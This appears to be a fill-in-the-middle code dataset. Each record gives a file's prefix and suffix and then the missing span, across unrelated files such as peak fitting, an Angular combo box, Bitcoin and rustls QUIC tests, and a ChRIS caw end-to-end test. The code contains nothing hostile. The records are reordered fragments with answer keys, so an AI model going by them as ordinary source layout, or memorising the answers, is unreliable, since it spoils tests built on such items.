# The separation between peaks in x units
delta = 0.0
height = 0.0
for i in range(npeaks):
height += y[int(peaks[i])] - bg[int(peaks[i])]
if i != npeaks - 1:
delta += (x[int(peaks[i + 1])] - x[int(peaks[i])])
# delta between peaks
if npeaks > 1:
fittedpar[1] = delta / (npeaks - 1)
# starting height
fittedpar[2] = height / npeaks
# position of the first peak
fittedpar[3] = x[int(peaks[0])]
# Estimate the fwhm
fittedpar[4] = search_fwhm
# setup constraints
cons = numpy.zeros((5, 3), numpy.float)
cons[0, 0] = CFIXED # the number of gaussians
if npeaks == 1:
cons[1, 0] = CFIXED # the delta between peaks
else:
cons[1, 0] = CFREE
j = 2
# Setup height area constrains
if not self.config['NoConstraintsFlag']:
if self.config['PositiveHeightAreaFlag']:
# POSITIVE = 1
cons[j, 0] = CPOSITIVE
cons[j, 1] = 0
cons[j, 2] = 0
j += 1
# Setup position constrains
if not self.config['NoConstraintsFlag']:
if self.config['QuotedPositionFlag']:
# QUOTED = 2
cons[j, 0] = CQUOTED
cons[j, 1] = min(x)
cons[j, 2] = max(x)
j += 1
# Setup positive FWHM constrains
if not self.config['NoConstraintsFlag']:
if self.config['PositiveFwhmFlag']:
# POSITIVE=1
cons[j, 0] = CPOSITIVE
cons[j, 1] = 0
cons[j, 2] = 0
j += 1
return fittedpar, cons
def configure(self, **kw):
"""Add new / unknown keyword arguments to :attr:`config`,
update entries in :attr:`config` if the parameter name is a existing
key.
:param kw: Dictionary of keyword arguments.
:return: Configuration dictionary :attr:`config`
"""
if not kw.keys():
return self.config
for key in kw.keys():
notdone = 1
# take care of lower / upper case problems ...
for config_key in self.config.keys():
if config_key.lower() == key.lower():
self.config[config_key] = kw[key]
notdone = 0
if notdone:
self.config[key] = kw[key]
return self.config
fitf |
index.ts | import {default as avatar} from '!!file-loader!../../../../../assets/images/avatar.jpg';
import {Component} from '@angular/core';
import {FormControl} from '@angular/forms';
import {Observable, of, Subject} from 'rxjs';
import {delay, filter, startWith, switchMap} from 'rxjs/operators';
import {changeDetection} from '../../../../../change-detection-strategy';
import {encapsulation} from '../../../../../view-encapsulation';
class User {
constructor(
readonly firstName: string,
readonly lastName: string,
readonly avatarUrl: string | null = null,
) {}
toString(): string {
return `${this.firstName} ${this.lastName}`;
}
}
const databaseMockData: ReadonlyArray<User> = [
new User('Roman', 'Sedov', 'http://marsibarsi.me/images/1x1small.jpg'),
new User('Alex', 'Inkin', avatar),
];
@Component({
selector: 'tui-combo-box-example-1',
templateUrl: './index.html',
styleUrls: ['./index.less'],
changeDetection,
encapsulation,
})
export class | {
readonly search$ = new Subject<string>();
readonly items$: Observable<ReadonlyArray<User> | null> = this.search$.pipe(
filter(value => value !== null),
switchMap(search =>
this.serverRequest(search).pipe(startWith<ReadonlyArray<User> | null>(null)),
),
startWith(databaseMockData),
);
readonly testValue = new FormControl(null);
onSearchChange(searchQuery: string) {
this.search$.next(searchQuery);
}
/**
* Service request emulation
*/
private serverRequest(searchQuery: string): Observable<ReadonlyArray<User>> {
const result = databaseMockData.filter(
user =>
user.toString().toLowerCase().indexOf(searchQuery.toLowerCase()) !== -1,
);
return of(result).pipe(delay(Math.random() * 1000 + 500));
}
}
| TuiComboBoxExample1 |
p2p_mempool.py | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The AmlBitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test p2p mempool message.
Test that nodes are disconnected if they send mempool messages when bloom
filters are not enabled.
"""
from test_framework.mininode import *
from test_framework.test_framework import AmlBitcoinTestFramework
from test_framework.util import *
class P2PMempoolTests(AmlBitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [["-peerbloomfilters=0"]]
def | (self):
#connect a mininode
aTestNode = NodeConnCB()
node = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], aTestNode)
aTestNode.add_connection(node)
NetworkThread().start()
aTestNode.wait_for_verack()
#request mempool
aTestNode.send_message(msg_mempool())
aTestNode.wait_for_disconnect()
#mininode must be disconnected at this point
assert_equal(len(self.nodes[0].getpeerinfo()), 0)
if __name__ == '__main__':
P2PMempoolTests().main()
| run_test |
neotrellis_simpletest.py | # SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
import time
from board import SCL, SDA
import busio
from adafruit_neotrellis.neotrellis import NeoTrellis
# create the i2c object for the trellis
i2c_bus = busio.I2C(SCL, SDA)
# create the trellis
trellis = NeoTrellis(i2c_bus)
# some color definitions
OFF = (0, 0, 0)
RED = (255, 0, 0)
YELLOW = (255, 150, 0)
GREEN = (0, 255, 0)
CYAN = (0, 255, 255)
BLUE = (0, 0, 255)
PURPLE = (180, 0, 255)
# this will be called when button events are received
| # turn the LED on when a rising edge is detected
if event.edge == NeoTrellis.EDGE_RISING:
trellis.pixels[event.number] = CYAN
# turn the LED off when a rising edge is detected
elif event.edge == NeoTrellis.EDGE_FALLING:
trellis.pixels[event.number] = OFF
for i in range(16):
# activate rising edge events on all keys
trellis.activate_key(i, NeoTrellis.EDGE_RISING)
# activate falling edge events on all keys
trellis.activate_key(i, NeoTrellis.EDGE_FALLING)
# set all keys to trigger the blink callback
trellis.callbacks[i] = blink
# cycle the LEDs on startup
trellis.pixels[i] = PURPLE
time.sleep(0.05)
for i in range(16):
trellis.pixels[i] = OFF
time.sleep(0.05)
while True:
# call the sync function call any triggered callbacks
trellis.sync()
# the trellis can only be read every 17 millisecons or so
time.sleep(0.02) | def blink(event):
|
config.rs | /*
* Copyright 2018 Intel Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* ------------------------------------------------------------------------------
*/
use std::env;
use std::path::{Path, PathBuf};
const DEFAULT_CONFIG_DIR: &str = "/etc/sawtooth";
const DEFAULT_LOG_DIR: &str = "/var/log/sawtooth";
const DEFAULT_DATA_DIR: &str = "/var/lib/sawtooth";
const DEFAULT_KEY_DIR: &str = "/etc/sawtooth/keys";
const DEFAULT_POLICY_DIR: &str = "/etc/sawtooth/policy";
const DEFAULT_BLOCKSTORE_FILENAME: &str = "block-00.lmdb";
pub struct PathConfig {
pub config_dir: PathBuf,
pub log_dir: PathBuf,
pub data_dir: PathBuf,
pub key_dir: PathBuf,
pub policy_dir: PathBuf,
}
pub fn | () -> PathConfig {
match env::var("SAWTOOTH_HOME") {
Ok(prefix) => PathConfig {
config_dir: Path::new(&prefix).join("etc"),
log_dir: Path::new(&prefix).join("logs"),
data_dir: Path::new(&prefix).join("data"),
key_dir: Path::new(&prefix).join("keys"),
policy_dir: Path::new(&prefix).join("policy"),
},
Err(_) => PathConfig {
config_dir: Path::new(DEFAULT_CONFIG_DIR).to_path_buf(),
log_dir: Path::new(DEFAULT_LOG_DIR).to_path_buf(),
data_dir: Path::new(DEFAULT_DATA_DIR).to_path_buf(),
key_dir: Path::new(DEFAULT_KEY_DIR).to_path_buf(),
policy_dir: Path::new(DEFAULT_POLICY_DIR).to_path_buf(),
},
}
}
pub fn get_blockstore_filename() -> String {
String::from(DEFAULT_BLOCKSTORE_FILENAME)
}
| get_path_config |
quic.rs | /// This module contains optional APIs for implementing QUIC TLS.
use crate::client::{ClientConfig, ClientSession};
use crate::error::TlsError;
use crate::key_schedule::hkdf_expand;
use crate::msgs::enums::{AlertDescription, ContentType, ProtocolVersion};
use crate::msgs::handshake::{ClientExtension, ServerExtension};
use crate::msgs::message::{Message, MessagePayload};
use crate::server::{ServerConfig, ServerSession, ServerSessionImpl};
use crate::session::{Protocol, SessionCommon};
use crate::suites::{BulkAlgorithm, SupportedCipherSuite, TLS13_AES_128_GCM_SHA256};
use std::sync::Arc;
use ring::{aead, hkdf};
use webpki;
/// Secrets used to encrypt/decrypt traffic
#[derive(Clone, Debug)]
pub(crate) struct Secrets {
/// Secret used to encrypt packets transmitted by the client
pub client: hkdf::Prk,
/// Secret used to encrypt packets transmitted by the server
pub server: hkdf::Prk,
}
impl Secrets {
fn local_remote(&self, is_client: bool) -> (&hkdf::Prk, &hkdf::Prk) {
if is_client {
(&self.client, &self.server)
} else {
(&self.server, &self.client)
}
}
}
/// Generic methods for QUIC sessions
pub trait QuicExt {
/// Return the TLS-encoded transport parameters for the session's peer.
fn get_quic_transport_parameters(&self) -> Option<&[u8]>;
/// Compute the keys for encrypting/decrypting 0-RTT packets, if available
fn get_0rtt_keys(&self) -> Option<DirectionalKeys>;
/// Consume unencrypted TLS handshake data.
///
/// Handshake data obtained from separate encryption levels should be supplied in separate calls.
fn read_hs(&mut self, plaintext: &[u8]) -> Result<(), TlsError>;
/// Emit unencrypted TLS handshake data.
///
/// When this returns `Some(_)`, the new keys must be used for future handshake data.
fn write_hs(&mut self, buf: &mut Vec<u8>) -> Option<Keys>;
/// Emit the TLS description code of a fatal alert, if one has arisen.
///
/// Check after `read_hs` returns `Err(_)`.
fn get_alert(&self) -> Option<AlertDescription>;
/// Compute the keys to use following a 1-RTT key update
///
/// Must not be called until the handshake is complete
fn next_1rtt_keys(&mut self) -> PacketKeySet;
}
impl QuicExt for ClientSession {
fn get_quic_transport_parameters(&self) -> Option<&[u8]> {
self.common
.quic
.params
.as_ref()
.map(|v| v.as_ref())
}
fn get_0rtt_keys(&self) -> Option<DirectionalKeys> {
Some(DirectionalKeys::new(
self.resumption_ciphersuite?,
self.common.quic.early_secret.as_ref()?,
))
}
fn read_hs(&mut self, plaintext: &[u8]) -> Result<(), TlsError> {
read_hs(&mut self.common, plaintext)?;
self.process_new_handshake_messages()
}
fn write_hs(&mut self, buf: &mut Vec<u8>) -> Option<Keys> {
write_hs(&mut self.common, buf)
}
fn get_alert(&self) -> Option<AlertDescription> {
self.common.quic.alert
}
fn next_1rtt_keys(&mut self) -> PacketKeySet {
next_1rtt_keys(&mut self.common)
}
}
impl QuicExt for ServerSession {
fn get_quic_transport_parameters(&self) -> Option<&[u8]> {
self.imp
.common
.quic
.params
.as_ref()
.map(|v| v.as_ref())
}
fn | (&self) -> Option<DirectionalKeys> {
Some(DirectionalKeys::new(
self.imp.common.get_suite()?,
self.imp
.common
.quic
.early_secret
.as_ref()?,
))
}
fn read_hs(&mut self, plaintext: &[u8]) -> Result<(), TlsError> {
read_hs(&mut self.imp.common, plaintext)?;
self.imp
.process_new_handshake_messages()
}
fn write_hs(&mut self, buf: &mut Vec<u8>) -> Option<Keys> {
write_hs(&mut self.imp.common, buf)
}
fn get_alert(&self) -> Option<AlertDescription> {
self.imp.common.quic.alert
}
fn next_1rtt_keys(&mut self) -> PacketKeySet {
next_1rtt_keys(&mut self.imp.common)
}
}
/// Keys used to communicate in a single direction
pub struct DirectionalKeys {
/// Encrypts or decrypts a packet's headers
pub header: aead::quic::HeaderProtectionKey,
/// Encrypts or decrypts the payload of a packet
pub packet: PacketKey,
}
impl DirectionalKeys {
fn new(suite: &'static SupportedCipherSuite, secret: &hkdf::Prk) -> Self {
let hp_alg = match suite.bulk {
BulkAlgorithm::AES_128_GCM => &aead::quic::AES_128,
BulkAlgorithm::AES_256_GCM => &aead::quic::AES_256,
BulkAlgorithm::CHACHA20_POLY1305 => &aead::quic::CHACHA20,
};
Self {
header: hkdf_expand(secret, hp_alg, b"quic hp", &[]),
packet: PacketKey::new(suite, secret),
}
}
}
/// Keys to encrypt or decrypt the payload of a packet
pub struct PacketKey {
/// Encrypts or decrypts a packet's payload
pub key: aead::LessSafeKey,
/// Computes unique nonces for each packet
pub iv: Iv,
}
impl PacketKey {
fn new(suite: &'static SupportedCipherSuite, secret: &hkdf::Prk) -> Self {
Self {
key: aead::LessSafeKey::new(hkdf_expand(
secret,
suite.aead_algorithm,
b"quic key",
&[],
)),
iv: hkdf_expand(secret, IvLen, b"quic iv", &[]),
}
}
}
/// Packet protection keys for bidirectional 1-RTT communication
pub struct PacketKeySet {
/// Encrypts outgoing packets
pub local: PacketKey,
/// Decrypts incoming packets
pub remote: PacketKey,
}
/// Computes unique nonces for each packet
pub struct Iv([u8; aead::NONCE_LEN]);
impl Iv {
/// Compute the nonce to use for encrypting or decrypting `packet_number`
pub fn nonce_for(&self, packet_number: u64) -> ring::aead::Nonce {
let mut out = [0; aead::NONCE_LEN];
out[4..].copy_from_slice(&packet_number.to_be_bytes());
for (out, inp) in out.iter_mut().zip(self.0.iter()) {
*out ^= inp;
}
aead::Nonce::assume_unique_for_key(out)
}
}
impl From<hkdf::Okm<'_, IvLen>> for Iv {
fn from(okm: hkdf::Okm<IvLen>) -> Self {
let mut iv = [0; aead::NONCE_LEN];
okm.fill(&mut iv[..]).unwrap();
Iv(iv)
}
}
struct IvLen;
impl hkdf::KeyType for IvLen {
fn len(&self) -> usize {
aead::NONCE_LEN
}
}
/// Complete set of keys used to communicate with the peer
pub struct Keys {
/// Encrypts outgoing packets
pub local: DirectionalKeys,
/// Decrypts incoming packets
pub remote: DirectionalKeys,
}
impl Keys {
/// Construct keys for use with initial packets
pub fn initial(
initial_salt: &hkdf::Salt,
client_dst_connection_id: &[u8],
is_client: bool,
) -> Self {
const CLIENT_LABEL: &[u8] = b"client in";
const SERVER_LABEL: &[u8] = b"server in";
let hs_secret = initial_salt.extract(client_dst_connection_id);
let secrets = Secrets {
client: hkdf_expand(&hs_secret, hkdf::HKDF_SHA256, CLIENT_LABEL, &[]),
server: hkdf_expand(&hs_secret, hkdf::HKDF_SHA256, SERVER_LABEL, &[]),
};
Self::new(&TLS13_AES_128_GCM_SHA256, is_client, &secrets)
}
fn new(suite: &'static SupportedCipherSuite, is_client: bool, secrets: &Secrets) -> Self {
let (local, remote) = secrets.local_remote(is_client);
Keys {
local: DirectionalKeys::new(suite, local),
remote: DirectionalKeys::new(suite, remote),
}
}
}
fn read_hs(this: &mut SessionCommon, plaintext: &[u8]) -> Result<(), TlsError> {
if this
.handshake_joiner
.take_message(Message {
typ: ContentType::Handshake,
version: ProtocolVersion::TLSv1_3,
payload: MessagePayload::new_opaque(plaintext.into()),
})
.is_none()
{
this.quic.alert = Some(AlertDescription::DecodeError);
return Err(TlsError::CorruptMessage);
}
Ok(())
}
fn write_hs(this: &mut SessionCommon, buf: &mut Vec<u8>) -> Option<Keys> {
while let Some((_, msg)) = this.quic.hs_queue.pop_front() {
buf.extend_from_slice(&msg);
if let Some(&(true, _)) = this.quic.hs_queue.front() {
if this.quic.hs_secrets.is_some() {
// Allow the caller to switch keys before proceeding.
break;
}
}
}
if let Some(secrets) = this.quic.hs_secrets.take() {
return Some(Keys::new(this.get_suite_assert(), this.is_client, &secrets));
}
if let Some(secrets) = this.quic.traffic_secrets.as_ref() {
if !this.quic.returned_traffic_keys {
this.quic.returned_traffic_keys = true;
return Some(Keys::new(this.get_suite_assert(), this.is_client, &secrets));
}
}
None
}
fn next_1rtt_keys(this: &mut SessionCommon) -> PacketKeySet {
let hkdf_alg = this.get_suite_assert().hkdf_algorithm;
let secrets = this
.quic
.traffic_secrets
.as_ref()
.expect("traffic keys not yet available");
let next = next_1rtt_secrets(hkdf_alg, secrets);
let (local, remote) = next.local_remote(this.is_client);
let keys = PacketKeySet {
local: PacketKey::new(this.get_suite_assert(), local),
remote: PacketKey::new(this.get_suite_assert(), remote),
};
this.quic.traffic_secrets = Some(next);
keys
}
fn next_1rtt_secrets(hkdf_alg: hkdf::Algorithm, prev: &Secrets) -> Secrets {
Secrets {
client: hkdf_expand(&prev.client, hkdf_alg, b"quic ku", &[]),
server: hkdf_expand(&prev.server, hkdf_alg, b"quic ku", &[]),
}
}
/// Methods specific to QUIC client sessions
pub trait ClientQuicExt {
/// Make a new QUIC ClientSession. This differs from `ClientSession::new()`
/// in that it takes an extra argument, `params`, which contains the
/// TLS-encoded transport parameters to send.
fn new_quic(
config: &Arc<ClientConfig>,
quic_version: Version,
hostname: webpki::DNSNameRef,
params: Vec<u8>,
) -> Result<ClientSession, TlsError> {
assert!(
config
.versions
.iter()
.all(|x| x.get_u16() >= ProtocolVersion::TLSv1_3.get_u16()),
"QUIC requires TLS version >= 1.3"
);
let ext = match quic_version {
Version::V1Draft => ClientExtension::TransportParametersDraft(params),
Version::V1 => ClientExtension::TransportParameters(params),
};
let mut session = ClientSession::from_config(config);
session.common.protocol = Protocol::Quic;
session.start_handshake(hostname.into(), vec![ext])?;
Ok(session)
}
}
impl ClientQuicExt for ClientSession {}
/// Methods specific to QUIC server sessions
pub trait ServerQuicExt {
/// Make a new QUIC ServerSession. This differs from `ServerSession::new()`
/// in that it takes an extra argument, `params`, which contains the
/// TLS-encoded transport parameters to send.
fn new_quic(
config: &Arc<ServerConfig>,
quic_version: Version,
params: Vec<u8>,
) -> ServerSession {
assert!(
config
.versions
.iter()
.all(|x| x.get_u16() >= ProtocolVersion::TLSv1_3.get_u16()),
"QUIC requires TLS version >= 1.3"
);
assert!(
config.max_early_data_size == 0 || config.max_early_data_size == 0xffff_ffff,
"QUIC sessions must set a max early data of 0 or 2^32-1"
);
let ext = match quic_version {
Version::V1Draft => ServerExtension::TransportParametersDraft(params),
Version::V1 => ServerExtension::TransportParameters(params),
};
let mut imp = ServerSessionImpl::new(config, vec![ext]);
imp.common.protocol = Protocol::Quic;
ServerSession { imp }
}
}
impl ServerQuicExt for ServerSession {}
/// QUIC protocol version
///
/// Governs version-specific behavior in the TLS layer
#[non_exhaustive]
pub enum Version {
/// Draft versions prior to V1
V1Draft,
/// First stable RFC
V1,
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn initial_keys_test_vectors() {
// Test vectors based on draft 27
const INITIAL_SALT: [u8; 20] = [
0xc3, 0xee, 0xf7, 0x12, 0xc7, 0x2e, 0xbb, 0x5a, 0x11, 0xa7, 0xd2, 0x43, 0x2b, 0xb4,
0x63, 0x65, 0xbe, 0xf9, 0xf5, 0x02,
];
const CONNECTION_ID: &[u8] = &[0x83, 0x94, 0xc8, 0xf0, 0x3e, 0x51, 0x57, 0x08];
const PACKET_NUMBER: u64 = 42;
let initial_salt = hkdf::Salt::new(hkdf::HKDF_SHA256, &INITIAL_SALT);
let server_keys = Keys::initial(&initial_salt, &CONNECTION_ID, false);
let client_keys = Keys::initial(&initial_salt, &CONNECTION_ID, true);
// Nonces
const SERVER_NONCE: [u8; 12] = [
0x5e, 0x5a, 0xe6, 0x51, 0xfd, 0x1e, 0x84, 0x95, 0xaf, 0x13, 0x50, 0xa1,
];
assert_eq!(
server_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&SERVER_NONCE
);
assert_eq!(
client_keys
.remote
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&SERVER_NONCE
);
const CLIENT_NONCE: [u8; 12] = [
0x86, 0x81, 0x35, 0x94, 0x10, 0xa7, 0x0b, 0xb9, 0xc9, 0x2f, 0x04, 0x0a,
];
assert_eq!(
server_keys
.remote
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&CLIENT_NONCE
);
assert_eq!(
client_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER)
.as_ref(),
&CLIENT_NONCE
);
// Header encryption mask
const SAMPLE: &[u8] = &[
0x70, 0x02, 0x59, 0x6f, 0x99, 0xae, 0x67, 0xab, 0xf6, 0x5a, 0x58, 0x52, 0xf5, 0x4f,
0x58, 0xc3,
];
const SERVER_MASK: [u8; 5] = [0x38, 0x16, 0x8a, 0x0c, 0x25];
assert_eq!(
server_keys
.local
.header
.new_mask(SAMPLE)
.unwrap(),
SERVER_MASK
);
assert_eq!(
client_keys
.remote
.header
.new_mask(SAMPLE)
.unwrap(),
SERVER_MASK
);
const CLIENT_MASK: [u8; 5] = [0xae, 0x96, 0x2e, 0x67, 0xec];
assert_eq!(
server_keys
.remote
.header
.new_mask(SAMPLE)
.unwrap(),
CLIENT_MASK
);
assert_eq!(
client_keys
.local
.header
.new_mask(SAMPLE)
.unwrap(),
CLIENT_MASK
);
const AAD: &[u8] = &[
0xc9, 0xff, 0x00, 0x00, 0x1b, 0x00, 0x08, 0xf0, 0x67, 0xa5, 0x50, 0x2a, 0x42, 0x62,
0xb5, 0x00, 0x40, 0x74, 0x16, 0x8b,
];
let aad = aead::Aad::from(AAD);
const PLAINTEXT: [u8; 12] = [
0x0d, 0x00, 0x00, 0x00, 0x00, 0x18, 0x41, 0x0a, 0x02, 0x00, 0x00, 0x56,
];
let mut payload = PLAINTEXT;
let server_nonce = server_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER);
let tag = server_keys
.local
.packet
.key
.seal_in_place_separate_tag(server_nonce, aad, &mut payload)
.unwrap();
assert_eq!(
payload,
[
0x0d, 0x91, 0x96, 0x31, 0xc0, 0xeb, 0x84, 0xf2, 0x88, 0x59, 0xfe, 0xc0
]
);
assert_eq!(
tag.as_ref(),
&[
0xdf, 0xee, 0x06, 0x81, 0x9e, 0x7a, 0x08, 0x34, 0xe4, 0x94, 0x19, 0x79, 0x5f, 0xe0,
0xd7, 0x3f
]
);
let aad = aead::Aad::from(AAD);
let mut payload = PLAINTEXT;
let client_nonce = client_keys
.local
.packet
.iv
.nonce_for(PACKET_NUMBER);
let tag = client_keys
.local
.packet
.key
.seal_in_place_separate_tag(client_nonce, aad, &mut payload)
.unwrap();
assert_eq!(
payload,
[
0x89, 0x6c, 0x66, 0x91, 0xe0, 0x9f, 0x47, 0x7a, 0x91, 0x42, 0xa4, 0x46
]
);
assert_eq!(
tag.as_ref(),
&[
0xb6, 0xff, 0xef, 0x89, 0xd5, 0xcb, 0x53, 0xd0, 0x98, 0xf7, 0x40, 0xa, 0x8d, 0x97,
0x72, 0x6e
]
);
}
#[test]
fn key_update_test_vector() {
fn equal_prk(x: &hkdf::Prk, y: &hkdf::Prk) -> bool {
let mut x_data = [0; 16];
let mut y_data = [0; 16];
let x_okm = x
.expand(&[b"info"], &aead::quic::AES_128)
.unwrap();
x_okm.fill(&mut x_data[..]).unwrap();
let y_okm = y
.expand(&[b"info"], &aead::quic::AES_128)
.unwrap();
y_okm.fill(&mut y_data[..]).unwrap();
x_data == y_data
}
let initial = Secrets {
// Constant dummy values for reproducibility
client: hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0xb8, 0x76, 0x77, 0x08, 0xf8, 0x77, 0x23, 0x58, 0xa6, 0xea, 0x9f, 0xc4, 0x3e,
0x4a, 0xdd, 0x2c, 0x96, 0x1b, 0x3f, 0x52, 0x87, 0xa6, 0xd1, 0x46, 0x7e, 0xe0,
0xae, 0xab, 0x33, 0x72, 0x4d, 0xbf,
],
),
server: hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0x42, 0xdc, 0x97, 0x21, 0x40, 0xe0, 0xf2, 0xe3, 0x98, 0x45, 0xb7, 0x67, 0x61,
0x34, 0x39, 0xdc, 0x67, 0x58, 0xca, 0x43, 0x25, 0x9b, 0x87, 0x85, 0x06, 0x82,
0x4e, 0xb1, 0xe4, 0x38, 0xd8, 0x55,
],
),
};
let updated = next_1rtt_secrets(hkdf::HKDF_SHA256, &initial);
assert!(equal_prk(
&updated.client,
&hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0x42, 0xca, 0xc8, 0xc9, 0x1c, 0xd5, 0xeb, 0x40, 0x68, 0x2e, 0x43, 0x2e, 0xdf,
0x2d, 0x2b, 0xe9, 0xf4, 0x1a, 0x52, 0xca, 0x6b, 0x22, 0xd8, 0xe6, 0xcd, 0xb1,
0xe8, 0xac, 0xa9, 0x6, 0x1f, 0xce
]
)
));
assert!(equal_prk(
&updated.server,
&hkdf::Prk::new_less_safe(
hkdf::HKDF_SHA256,
&[
0xeb, 0x7f, 0x5e, 0x2a, 0x12, 0x3f, 0x40, 0x7d, 0xb4, 0x99, 0xe3, 0x61, 0xca,
0xe5, 0x90, 0xd4, 0xd9, 0x92, 0xe1, 0x4b, 0x7a, 0xce, 0x3, 0xc2, 0x44, 0xe0,
0x42, 0x21, 0x15, 0xb6, 0xd3, 0x8a
]
)
));
}
}
| get_0rtt_keys |
mod.rs | //! Futures
//!
//! This module contains a number of functions for working with `Future`s,
//! including the [`FutureExt`] trait and the [`TryFutureExt`] trait which add
//! methods to `Future` types.
#[cfg(feature = "alloc")]
pub use futures_core::future::{BoxFuture, LocalBoxFuture};
pub use futures_core::future::{FusedFuture, Future, TryFuture};
pub use futures_task::{FutureObj, LocalFutureObj, UnsafeFutureObj};
// Extension traits and combinators
#[allow(clippy::module_inception)]
mod future;
pub use self::future::{
Flatten, Fuse, FutureExt, Inspect, IntoStream, Map, NeverError, Then, UnitError, MapInto,
};
#[deprecated(note = "This is now an alias for [Flatten](Flatten)")]
pub use self::future::FlattenStream;
#[cfg(feature = "std")]
pub use self::future::CatchUnwind;
#[cfg(feature = "channel")]
#[cfg(feature = "std")]
pub use self::future::{Remote, RemoteHandle};
#[cfg(feature = "std")]
pub use self::future::Shared;
mod try_future;
pub use self::try_future::{
AndThen, ErrInto, OkInto, InspectErr, InspectOk, IntoFuture, MapErr, MapOk, OrElse, TryFlattenStream,
TryFutureExt, UnwrapOrElse, MapOkOrElse, TryFlatten,
};
#[cfg(feature = "sink")]
pub use self::try_future::FlattenSink;
// Primitive futures
mod lazy;
pub use self::lazy::{lazy, Lazy};
mod pending;
pub use self::pending::{pending, Pending};
mod maybe_done;
pub use self::maybe_done::{maybe_done, MaybeDone};
mod try_maybe_done;
pub use self::try_maybe_done::{try_maybe_done, TryMaybeDone};
mod option;
pub use self::option::OptionFuture;
mod poll_fn;
pub use self::poll_fn::{poll_fn, PollFn};
mod ready;
pub use self::ready::{err, ok, ready, Ready};
mod join;
pub use self::join::{join, join3, join4, join5, Join, Join3, Join4, Join5};
#[cfg(feature = "alloc")]
mod join_all;
#[cfg(feature = "alloc")]
pub use self::join_all::{join_all, JoinAll};
mod select;
pub use self::select::{select, Select};
#[cfg(feature = "alloc")]
mod select_all;
#[cfg(feature = "alloc")]
pub use self::select_all::{select_all, SelectAll};
mod try_join;
pub use self::try_join::{
try_join, try_join3, try_join4, try_join5, TryJoin, TryJoin3, TryJoin4, TryJoin5,
};
#[cfg(feature = "alloc")]
mod try_join_all;
#[cfg(feature = "alloc")]
pub use self::try_join_all::{try_join_all, TryJoinAll};
mod try_select;
pub use self::try_select::{try_select, TrySelect};
#[cfg(feature = "alloc")]
mod select_ok;
#[cfg(feature = "alloc")]
pub use self::select_ok::{select_ok, SelectOk};
mod either;
pub use self::either::Either;
cfg_target_has_atomic! {
#[cfg(feature = "alloc")]
mod abortable;
#[cfg(feature = "alloc")]
pub use self::abortable::{abortable, Abortable, AbortHandle, AbortRegistration, Aborted};
}
// Just a helper function to ensure the futures we're returning all have the
// right implementations.
fn | <T, F>(future: F) -> F
where
F: Future<Output = T>,
{
future
}
| assert_future |
issue-6804.rs | // Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Matching against NaN should result in a warning
#![feature(slice_patterns)]
#![allow(unused)]
use std::f64::NAN;
fn main() | {
let x = NAN;
match x {
NAN => {}, //~ ERROR floating point constants cannot be used
//~| WARNING hard error
_ => {},
};
match [x, 1.0] {
[NAN, _] => {}, //~ ERROR floating point constants cannot be used
//~| WARNING hard error
_ => {},
};
} |
|
test_e2e.py | """
An end-to-end test which performs the following:
1. creates a ChRIS user account.
2. caw login
3. caw search
4. caw upload --pipeline ...
5. caw download
6. caw logout
"""
import os
import unittest
import random
import string
import requests
import subprocess as sp
from tempfile import NamedTemporaryFile, TemporaryDirectory
from time import sleep
from glob import iglob
def random_string(length=12) -> str:
return ''.join(random.choice(string.ascii_letters) for x in range(length))
address = 'http://localhost:8000/api/v1/'
username = 'caw_test_' + random_string(6)
password = random_string(12)
def create_account():
res = requests.post(
f'{address}users/',
headers={
'Content-Type': 'application/vnd.collection+json',
'Accept': 'application/json'
},
json={
'template': {
'data': [
{
'name': 'email',
'value': f'{username}@babyMRI.org'
},
{
'name': 'username',
'value': username
},
{
'name': 'password',
'value': password
}
]
}
}
)
res.raise_for_status()
data = res.json()
assert 'username' in data
assert data['username'] == username
def poll_feed(feed_url: str, jobs_count: int, poll_interval=10, timeout=300) -> dict:
timer = 0
headers = {
'Accept': 'application/json'
}
data = {}
while timer <= timeout:
print(f'calling get with {feed_url}')
import logging
logging.getLogger().setLevel(logging.DEBUG)
res = requests.get(feed_url, headers=headers, auth=(username, password))
res.raise_for_status()
data = res.json()
if data['finished_jobs'] == jobs_count:
return data
sleep(poll_interval)
timer += poll_interval
return data
class TestEndToEnd(unittest.TestCase):
@unittest.skipUnless('CAW_TEST_FULL' in os.environ, 'Set CAW_TEST_FULL=y to run the end-to-end test.')
def test_endtoend(self):
|
if __name__ == '__main__':
unittest.main()
| create_account()
sp.run(['caw', '--address', address, '--username', username, 'login', '--password-stdin'],
input=(password + '\n'), text=True, check=True)
with NamedTemporaryFile('w', suffix='.txt', delete=False) as f:
f.write("If you steal from one author it's plagiarism; if you steal from"
"\nmany it's research."
'\n -- Wilson Mizner\n')
search = sp.check_output(['caw', 'search'], text=True)
self.assertIn('Example branching pipeline', search,
msg='"Example branching pipeline" not found in `caw search`')
